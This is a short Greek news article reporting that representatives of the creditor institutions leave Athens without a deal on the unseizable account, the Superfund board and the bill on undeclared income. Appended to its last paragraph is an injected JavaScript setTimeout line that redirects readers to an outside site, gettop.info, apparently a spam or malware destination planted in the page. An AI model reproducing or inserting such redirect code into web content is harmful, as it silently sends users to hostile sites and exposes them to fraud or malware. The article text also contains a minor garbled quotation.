Χωρίς συμφωνία φεύγουν οι εκπρόσωποι των θεσμών

0
3

 

Όπως ήταν προγραμματισμένο, αποχωρούν σήμερα από την Αθήνα οι εκπρόσωποι των θεσμών χωρίς συμφωνία και με ανοιχτά μέτωπα. Αυτά συνίστανται στον ακατάσχετο λογαριασμό, τη στελέχωση του Υπερταμείου και τα αδήλωτα εισοδήματα.

Αξιωματούχοι από το υπουργείο Οικονομικών αναφέρουν πως για τις ηλεκτρονικές συναλλαγές έχει γίνει πρόοδος σε σχέση με τα κίνητρα που θα δοθούν στον κόσμο.

Ωστόσο υπάρχει διαφωνία στο θέμα του ακατάσχετου. λέγοντας πως «α δούμε αν θα λυθεί η διαφωνία με περισσότερο κίνητρα στους φορολογουμένους». Είναι πλέον ανοιχτό το ενδεχόμενο να μην προχωρήσει ο ακατάσχετος λογαριασμός.

Επίσης, δεν υπήρξε συμφωνία για τα πρόσωπα που θα στελεχώσουν το εποπτικό συμβούλιο του Υπερταμείου, αν και από το υπουργείο εκτιμούν πως τις επόμενες ημέρες θα υπάρξει συμφωνία ανάμεσα στις δύο πλευρές.

Επιπλέον παρουσιάζονται διαφορές σε τεχνικό κυρίως επίπεδο και στο νομοσχέδιο για τα αδήλωτα εισοδήματα. Πρακτικά αυτό σημαίνει πως θα καθυστερήσει κι άλλο.

Πάντως, στις 29 Σεπτεμβρίου αναμένεται να κλείσουν τα προαπαιτούμενα οπότε και θα συνεδριάσει το Euroworking Group. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here